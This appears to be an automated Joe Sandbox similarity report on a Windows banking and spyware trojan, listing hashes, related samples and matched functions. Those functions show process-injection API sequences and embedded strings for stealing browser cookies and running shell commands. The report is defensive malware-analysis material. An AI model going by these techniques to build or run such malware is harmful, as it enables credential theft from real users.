Similarity Report

Overview

General Information

Joe Sandbox Version:	23.0.0
Analysis ID:	646398
Start date:	28.08.2018
Start time:	12:55:34
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 7m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Zx7i3Q9U9i (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies	HCA enabled EGA enabled HDC enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.bank.troj.spyw.evad.winEXE@15/13@12/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 22.4% (good quality ratio 22.4%) Quality average: 97.2% Quality standard deviation: 6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 137 Number of non-executed functions: 173
Cookbook Comments:	Adjust boot time
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Static File Info

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.988606409235657
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Zx7i3Q9U9i.exe
File size:	267776
MD5:	e2476ed98a57bbb14f45fd1e04d4c43c
SHA1:	999a0891ff900227f6a23b95eb708fab5caa7d78
SHA256:	bd36dfdb6de9b3785f089dca00c2bbcbdd01a158b6112c5505119c3c9464ef9f
SHA512:	3f31c7eebea35265d5fd6e740ca51e29ccd4b5f08f688197c4b4ee2ed81bf82643470535de070f1857a72cbf71bb012fb36659a0431b4edde5d12e29d9500e05
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?...?...?.......?...>...?...b...?..FN...?..FG...?.Rich..?.........................PE..L......Z...........................

Similarity Information

Algorithm:	APISTRING
Total Signature IDs in Database:	4106864
Total Processes Database:	48838
Total similar Processes:	985
Total similar Functions:	23722

Similar Processes

Zx7i3Q9U9i.exe (MD5: E2476ED98A57BBB14F45FD1E04D4C43C, PID: 3424)

explorer.exe (PID: 1432, MD5: 6DDCA324434FFA506CF7DC4E51DB7935 AnalysisID: 44237 Similar Functions: 79)
87024.exe (PID: 3984, MD5: 1714CF2647A549D0D7529223ACF0FC97 AnalysisID: 56552 Similar Functions: 61)
apdsroxy.exe (PID: 3636, MD5: B6EECE7B4FD1B4BD2626AA07E17DA9DE AnalysisID: 60981 Similar Functions: 39)
111post.exe (PID: 3632, MD5: 2E3FB8B38E59480ED8F47449A46E2082 AnalysisID: 66610 Similar Functions: 37)
crypmgmt.exe (PID: 3868, MD5: E5C7B986B6FD3733504DB3FD6D6FAADA AnalysisID: 68428 Similar Functions: 37)
sort.exe (PID: 3472, MD5: A8B931811E8A8BDB83E0AFF2E1C6E560 AnalysisID: 67025 Similar Functions: 37)
crypmgmt.exe (PID: 3564, MD5: 3F602782259014F0253ECDEDFEF4D261 AnalysisID: 68262 Similar Functions: 37)
crypmgmt.exe (PID: 3816, MD5: 34C71A2B5584813A6BC94888E3669320 AnalysisID: 64003 Similar Functions: 36)
crypmgmt.exe (PID: 3828, MD5: 479B945127CC75C2A44ED1B13482FB07 AnalysisID: 67591 Similar Functions: 36)
crypmgmt.exe (PID: 3524, MD5: C007415B17DF758F2ED04850F95EE60E AnalysisID: 64002 Similar Functions: 36)
crypmgmt.exe (PID: 3792, MD5: 707D88A25F54B3F8785905F254974BCE AnalysisID: 63657 Similar Functions: 35)
foaqDTP.exe (PID: 3540, MD5: B6EECE7B4FD1B4BD2626AA07E17DA9DE AnalysisID: 60981 Similar Functions: 35)
gifmsg.exe (PID: 3448, MD5: 5BDD37EDD3740A4E2DA2E05ABDC20A20 AnalysisID: 60136 Similar Functions: 34)
gifmsg.exe (PID: 3520, MD5: 5BDD37EDD3740A4E2DA2E05ABDC20A20 AnalysisID: 60136 Similar Functions: 34)
crypmgmt.exe (PID: 3524, MD5: 13FFE10E12298A4E8DC1EE7A0B003B93 AnalysisID: 58680 Similar Functions: 34)
crypmgmt.exe (PID: 3872, MD5: 0520E2BE92296DE286739115ACA14892 AnalysisID: 57932 Similar Functions: 34)
010.exe (PID: 3696, MD5: 39E01E2F5A5FBFECA5ABC01131E7E3A1 AnalysisID: 63143 Similar Functions: 33)
scansione_F24_.jpg.exe (PID: 3776, MD5: E5C7B986B6FD3733504DB3FD6D6FAADA AnalysisID: 68428 Similar Functions: 32)
crypmgmt.exe (PID: 3532, MD5: B58623B61A3D254FB9FF47FF0A4A74C6 AnalysisID: 66839 Similar Functions: 32)
032901.exe (PID: 3384, MD5: F3C6625D8EDE3FE6C8C4023337D761AC AnalysisID: 66739 Similar Functions: 32)
wukapedof.exe (PID: 2468, MD5: AD22F7E25E6FCCF900B5060D4C5E9532 AnalysisID: 68439 Similar Functions: 32)
yyya.exe (PID: 3736, MD5: 479B945127CC75C2A44ED1B13482FB07 AnalysisID: 67591 Similar Functions: 32)
0.exe (PID: 3388, MD5: 8905AD755F4CDCD7C4AF3FD546F67BFC AnalysisID: 65738 Similar Functions: 32)
10.exe (PID: 3420, MD5: 0CEEE3CE1679E892A20AEBA2258A928C AnalysisID: 59085 Similar Functions: 32)
crypt_0001_1096b.exe (PID: 3720, MD5: 34C71A2B5584813A6BC94888E3669320 AnalysisID: 64003 Similar Functions: 32)
itera.exe (PID: 3940, MD5: 1C84D323D09233F71A6087CD5DA1F24A AnalysisID: 57776 Similar Functions: 32)
upsc.exe (PID: 3700, MD5: 5F53229E5AC3246C28629EE07946ADB6 AnalysisID: 63295 Similar Functions: 32)
crypt_0001_1096a.exe (PID: 3408, MD5: C007415B17DF758F2ED04850F95EE60E AnalysisID: 64002 Similar Functions: 31)
file2.exe (PID: 3684, MD5: 2B6E31835DAF786F3E9DEEC103C208BB AnalysisID: 66847 Similar Functions: 31)
251287.exe (PID: 3620, MD5: 164138344D25F82E73E5E2EDB810187B AnalysisID: 544867 Similar Functions: 31)

d3d8sext.exe (MD5: E2476ED98A57BBB14F45FD1E04D4C43C, PID: 3520)

explorer.exe (PID: 1432, MD5: 6DDCA324434FFA506CF7DC4E51DB7935 AnalysisID: 37523 Similar Functions: 898)
cmd.exe (PID: 4004, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 544867 Similar Functions: 247)
apdsroxy.exe (PID: 3636, MD5: B6EECE7B4FD1B4BD2626AA07E17DA9DE AnalysisID: 60981 Similar Functions: 193)
crypmgmt.exe (PID: 3564, MD5: 3F602782259014F0253ECDEDFEF4D261 AnalysisID: 68262 Similar Functions: 178)
crypmgmt.exe (PID: 3784, MD5: AD22F7E25E6FCCF900B5060D4C5E9532 AnalysisID: 68439 Similar Functions: 172)
crypmgmt.exe (PID: 3888, MD5: 28093D270494BF7FD72450B008A4D71A AnalysisID: 68250 Similar Functions: 161)
crypmgmt.exe (PID: 3872, MD5: 0520E2BE92296DE286739115ACA14892 AnalysisID: 57932 Similar Functions: 158)
crypmgmt.exe (PID: 3816, MD5: 34C71A2B5584813A6BC94888E3669320 AnalysisID: 64003 Similar Functions: 156)
crypmgmt.exe (PID: 3868, MD5: E5C7B986B6FD3733504DB3FD6D6FAADA AnalysisID: 68428 Similar Functions: 156)
crypmgmt.exe (PID: 3520, MD5: 2977C206A36F6D0CEC371F9F767DE1D3 AnalysisID: 63005 Similar Functions: 155)
crypmgmt.exe (PID: 3524, MD5: C007415B17DF758F2ED04850F95EE60E AnalysisID: 64002 Similar Functions: 155)
crypmgmt.exe (PID: 3532, MD5: B58623B61A3D254FB9FF47FF0A4A74C6 AnalysisID: 66839 Similar Functions: 152)
crypmgmt.exe (PID: 3828, MD5: 479B945127CC75C2A44ED1B13482FB07 AnalysisID: 67591 Similar Functions: 151)
crypmgmt.exe (PID: 3752, MD5: 333EE1C0443D17DF5C79F6C4E40EA594 AnalysisID: 61981 Similar Functions: 150)
crypmgmt.exe (PID: 3568, MD5: F3C6625D8EDE3FE6C8C4023337D761AC AnalysisID: 66739 Similar Functions: 150)
crypmgmt.exe (PID: 3552, MD5: 2977C206A36F6D0CEC371F9F767DE1D3 AnalysisID: 63005 Similar Functions: 148)
crypmgmt.exe (PID: 3460, MD5: 9D985C429B23E924BB4D4ED98778EBBA AnalysisID: 67745 Similar Functions: 141)
crypmgmt.exe (PID: 3472, MD5: FA37EB66B10EB030E777AF9420FFCE9A AnalysisID: 66745 Similar Functions: 141)
crypmgmt.exe (PID: 4060, MD5: DA7FC1804FFFBD92337277B095147E63 AnalysisID: 64193 Similar Functions: 141)
crypmgmt.exe (PID: 2240, MD5: AD22F7E25E6FCCF900B5060D4C5E9532 AnalysisID: 68439 Similar Functions: 141)
crypmgmt.exe (PID: 2104, MD5: 3067FCCA87759E8F70DE41B4B5C179D9 AnalysisID: 63270 Similar Functions: 141)
crypmgmt.exe (PID: 3524, MD5: 13FFE10E12298A4E8DC1EE7A0B003B93 AnalysisID: 58680 Similar Functions: 141)
crypmgmt.exe (PID: 3912, MD5: 39E01E2F5A5FBFECA5ABC01131E7E3A1 AnalysisID: 63143 Similar Functions: 140)
crypmgmt.exe (PID: 3740, MD5: DA7FC1804FFFBD92337277B095147E63 AnalysisID: 64193 Similar Functions: 136)
crypmgmt.exe (PID: 3552, MD5: B91092360DF199385AC3DC6C3AA8A0E3 AnalysisID: 61691 Similar Functions: 135)
cmd.exe (PID: 2956, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 51932 Similar Functions: 134)
cmd.exe (PID: 3972, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 53359 Similar Functions: 133)
cmd.exe (PID: 2364, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 51301 Similar Functions: 133)
cmd.exe (PID: 2768, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 55548 Similar Functions: 133)
cmd.exe (PID: 3876, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 56191 Similar Functions: 133)

Similar Functions

Function_0000272A API ID: GetLastError$memcpymemset, String ID: , Total Matches: 409
Function_000177D7 API ID: GetLastError$memcpymemset, String ID: , Total Matches: 409
Function_0000272A API ID: GetLastError$memcpymemset, String ID: , Total Matches: 409
Function_00001175 API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 388
Function_0001B212 API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 388
Function_00001175 API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 388
Function_00002368 API ID: CloseHandleCreateFileReadFileSetFilePointer, String ID: , Total Matches: 385
Function_00002368 API ID: CloseHandleCreateFileReadFileSetFilePointer, String ID: , Total Matches: 385
Function_000173C8 API ID: CloseHandleCreateFileReadFileSetFilePointer, String ID: , Total Matches: 385
Function_00003A60 API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile, String ID: , Total Matches: 377
Function_00015D18 API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile, String ID: , Total Matches: 377
Function_00003A60 API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile, String ID: , Total Matches: 377
Function_00003B0D API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile, String ID: , Total Matches: 320
Function_00003B0D API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile, String ID: , Total Matches: 320
Function_000012D2 API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 307
Function_000012D2 API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 307
Function_000019FB API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess, String ID: , Total Matches: 305
Function_000019FB API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess, String ID: , Total Matches: 305
Function_0000178F API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset, String ID: , Total Matches: 297
Function_0000178F API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset, String ID: , Total Matches: 297
Function_0001BC65 API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset, String ID: , Total Matches: 297
Function_0000321D API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject, String ID: , Total Matches: 294
Function_0000321D API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject, String ID: , Total Matches: 294
Function_00002DE6 API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 238
Function_00002DE6 API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 238
Function_00002E27 API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 236
Function_00002E27 API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 236
Function_00002880 API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset, String ID: , Total Matches: 233
Function_00002880 API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset, String ID: , Total Matches: 233
Function_00002E68 API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 229
Function_00002E68 API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 229
Function_000022C5 API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess, String ID: , Total Matches: 223
Function_00017325 API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess, String ID: , Total Matches: 223
Function_000022C5 API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess, String ID: , Total Matches: 223
Function_00003B73 API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy, String ID: , Total Matches: 218
Function_00003B73 API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy, String ID: , Total Matches: 218
Function_0001792D API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset, String ID: , Total Matches: 207
Function_00002F3A API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken, String ID: , Total Matches: 204
Function_00000093 API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx, String ID: , Total Matches: 199
Function_00000093 API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx, String ID: , Total Matches: 199
Function_00000673 API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile, String ID: , Total Matches: 194
Function_00000673 API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile, String ID: , Total Matches: 194
Function_00001033 API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep, String ID: \\.\mailslot\msl0, Total Matches: 190
Function_00001034 API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep, String ID: \\.\mailslot\msl0, Total Matches: 190
Function_00001033 API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep, String ID: \\.\mailslot\msl0, Total Matches: 190
Function_00001034 API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep, String ID: \\.\mailslot\msl0, Total Matches: 190
Function_00001CD0 API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf, String ID: <, Total Matches: 183
Function_00001CD0 API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf, String ID: <, Total Matches: 183
Function_00000224 API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen, String ID: , Total Matches: 182
Function_00000224 API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen, String ID: , Total Matches: 182
Function_00000395 API ID: CreateProcessGetLastErrorHeapFreememset, String ID: D, Total Matches: 162
Function_00000186 API ID: HeapFree, String ID: Local\, Total Matches: 157
Function_00000186 API ID: HeapFree, String ID: Local\, Total Matches: 157
Function_00001427 API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess, String ID: , Total Matches: 154
Function_00001427 API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess, String ID: , Total Matches: 154
Function_0001C61D API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep, String ID: , Total Matches: 151
Function_0001C75C API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep, String ID: , Total Matches: 151
Function_00001E04 API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen, String ID: (, Total Matches: 146
Function_00001389 API ID: lstrlenmemset$GetProcAddressLoadLibrary, String ID: ~, Total Matches: 143
Function_00001389 API ID: lstrlenmemset$GetProcAddressLoadLibrary, String ID: ~, Total Matches: 143
EntryPoint API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate, String ID: , Total Matches: 141
Function_00000040 API ID: NtProtectVirtualMemory, String ID: z, Total Matches: 134
Function_0001AD3F API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset, String ID: , Total Matches: 131
Function_00002BF0 API ID: RegCreateKeyRegOpenKeylstrlen, String ID: , Total Matches: 129
Function_0000364F API ID: lstrlen$RtlAllocateHeapwsprintf, String ID: , Total Matches: 128
Function_0000AEAE API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread, String ID: , Total Matches: 120
Function_000034E2 API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects, String ID: , Total Matches: 117
Function_00002F3A API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken, String ID: , Total Matches: 114
Function_0001D2F9 API ID: lstrcpy$lstrlenmemcpy, String ID: , Total Matches: 113
Function_0000A978 API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile, String ID: , Total Matches: 110
Function_000171E6 API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess, String ID: , Total Matches: 108
Function_00002684 API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf, String ID: , Total Matches: 106
Function_00002682 API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf, String ID: , Total Matches: 106
Function_0000CF8E API ID: CloseHandleCreateThreadGetLastErrorHeapFree, String ID: , Total Matches: 105
Function_0000ACD2 API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe, String ID: , Total Matches: 99
Function_000167D8 API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: , Total Matches: 97
Function_0001B371 API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset, String ID: d, Total Matches: 97
Function_00001639 API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread, String ID: , Total Matches: 95
Function_000010FB API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset, String ID: \\.\mailslot\msl0, Total Matches: 95
Function_00001639 API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread, String ID: , Total Matches: 95
Function_000010FB API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset, String ID: \\.\mailslot\msl0, Total Matches: 95
Function_00006262 API ID: CloseHandleOpenFileMappinglstrlenmemset, String ID: , Total Matches: 95
Function_0001B4E7 API ID: CloseHandleGetLastError$OpenProcess, String ID: , Total Matches: 95
Function_0001E4FD API ID: FreeLibraryGetLastErrorlstrlenmbstowcs, String ID: , Total Matches: 92
Function_0001699E API ID: GetModuleHandleStrChrlstrcpylstrlen, String ID: , Total Matches: 87
Function_0000CCA5 API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError, String ID: , Total Matches: 86
Function_00002122 API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy, String ID: , Total Matches: 84
Function_000189D2 API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy, String ID: , Total Matches: 84
Function_00002122 API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy, String ID: , Total Matches: 84
Function_0000AB92 API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject, String ID: , Total Matches: 83
Function_000017F6 API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey, String ID: , Total Matches: 80
Function_00001B66 API ID: CloseHandleGetLastErrorHeapFreememset, String ID: , Total Matches: 79
Function_0001C885 API ID: memcpy$RtlAllocateHeaplstrlen, String ID: , Total Matches: 76
Function_00006341 API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen, String ID: Local\, Total Matches: 75
Function_0000D37D API ID: GetModuleHandleGetTickCountwsprintf, String ID: {%08X-%04X-%04X-%04X-%08X%04X}, Total Matches: 70
Function_00001884 API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat, String ID: , Total Matches: 66
Function_00016CFA API ID: VirtualProtect$GetLastErrorlstrcpylstrlen, String ID: , Total Matches: 65
Function_00002C55 API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap, String ID: , Total Matches: 64
Function_0001A838 API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject, String ID: , Total Matches: 62
Function_0000671B API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs, String ID: , Total Matches: 62
Function_000001B3 API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory, String ID: , Total Matches: 61
Function_00009C3A API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi, String ID: , Total Matches: 61
Function_00000473 API ID: HeapFreeRtlAllocateHeapwsprintf, String ID: | "%s" | %u, Total Matches: 61
Function_0000A593 API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy, String ID: , Total Matches: 61
Function_00003EEE API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf, String ID: , Total Matches: 61
Function_000010A7 API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy, String ID: , Total Matches: 60
Function_000060F5 API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset, String ID: , Total Matches: 60
Function_0000D0EE API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: , Total Matches: 60
Function_00002ACC API ID: HeapFreeRtlAllocateHeaplstrlen, String ID: EMPTY, Total Matches: 59
Function_0000A35F API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next, String ID: , Total Matches: 59
Function_0001D3AA API ID: memcpy$GetSystemTimeAsFileTimelstrlen, String ID: , Total Matches: 59
Function_00000C50 API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs, String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols, Total Matches: 59
Function_0001A47B API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset, String ID: , Total Matches: 59
Function_00006E21 API ID: StrToIntExmemcpy, String ID: 0x, Total Matches: 59
Function_00008F0B API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen, String ID: , Total Matches: 59
Function_00019FC4 API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread, String ID: , Total Matches: 59
Function_00006878 API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf, String ID: , Total Matches: 58
Function_00000A08 API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf, String ID: W, Total Matches: 58
Function_00016222 API ID: mbstowcs, String ID: account{*}.oeaccount, Total Matches: 58
Function_00007CA3 API ID: HeapFreelstrlen$mbstowcswcstombs, String ID: , Total Matches: 58
Function_0000AD48 API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen, String ID: , Total Matches: 58
Function_00006D61 API ID: memcpy$RtlAllocateHeap, String ID: [URL]$https://, Total Matches: 58
Function_00009D95 API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi, String ID: , Total Matches: 58
Function_000035F0 API ID: HeapFree$RegCloseKeyWaitForSingleObject, String ID: , Total Matches: 58
Function_000096B0 API ID: HeapFreeRtlAllocateHeapmemcpy, String ID: Access-Control-Allow-Origin:, Total Matches: 58
Function_000067DE API ID: HeapFreeRtlAllocateHeap, String ID: cmd /C "%s> %s1", Total Matches: 58
Function_0001D1CF API ID: GetComputerNameHeapFreeRtlAllocateHeap, String ID: Client, Total Matches: 57
Function_0001C36B API ID: SetLastErrorSleepWaitForSingleObjectmemset, String ID: vids, Total Matches: 57
Function_00006B90 API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy, String ID: , Total Matches: 57
Function_00001554 API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen, String ID: , Total Matches: 57
Function_00015DF6 API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile, String ID: , Total Matches: 57
Function_00003E59 API ID: RtlAllocateHeaplstrcpylstrlenmemcpy, String ID: , Total Matches: 57
Function_000069A7 API ID: HeapFree$DeleteFileStrTrimlstrlen, String ID: ss: *.*.*.*, Total Matches: 56
Function_00005241 API ID: GetModuleHandleTlsAlloc, String ID: CHROME.DLL, Total Matches: 56
Function_000162AD API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory, String ID: , Total Matches: 56
Function_00007B4E API ID: HeapFreememcpy$RtlAllocateHeap, String ID: , Total Matches: 56
Function_0000339B API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer, String ID: , Total Matches: 56
Function_0000748E API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject, String ID: , Total Matches: 56
Function_00006E94 API ID: HeapFreememcpymemset, String ID: chun, Total Matches: 56
Function_00018EAA API ID: lstrlen$RtlAllocateHeap, String ID: [FILE]$DllRegisterServer, Total Matches: 56
Function_0001A703 API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset, String ID: , Total Matches: 56
Function_00015F2E API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset, String ID: , Total Matches: 56
Function_000018FD API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen, String ID: , Total Matches: 55
Function_0000CB50 API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen, String ID: , Total Matches: 55
Function_0000B42B API ID: HeapFreelstrlenmemcpy, String ID: Access-Control-Allow-Origin:, Total Matches: 55
Function_0000738C API ID: HeapFreeRtlAllocateHeap, String ID: https://, Total Matches: 54
Function_00018BD6 API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset, String ID: [FILE]$}nls, Total Matches: 54
Function_0000CCEC API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset, String ID: , Total Matches: 54
Function_00008D54 API ID: HeapFree$RegCloseKeyRegCreateKey, String ID: , Total Matches: 54
Function_00003202 API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap, String ID: Main, Total Matches: 53
Function_000164F7 API ID: CreateDirectoryGetTempFileNameGetTickCount, String ID: \Low, Total Matches: 53
Function_00018692 API ID: StrTrim$_struprlstrlenmemcpymemset, String ID: , Total Matches: 53
Function_0000078D API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread, String ID: , Total Matches: 53
Function_00009895 API ID: RtlAllocateHeaplstrcpy, String ID: http, Total Matches: 52
Function_0000BB46 API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove, String ID: GET $GET $OPTI$OPTI$POST$PUT , Total Matches: 52
Function_00002996 API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey, String ID: [FILE]$[FILE], Total Matches: 51
Function_00001B25 API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile, String ID: , Total Matches: 51
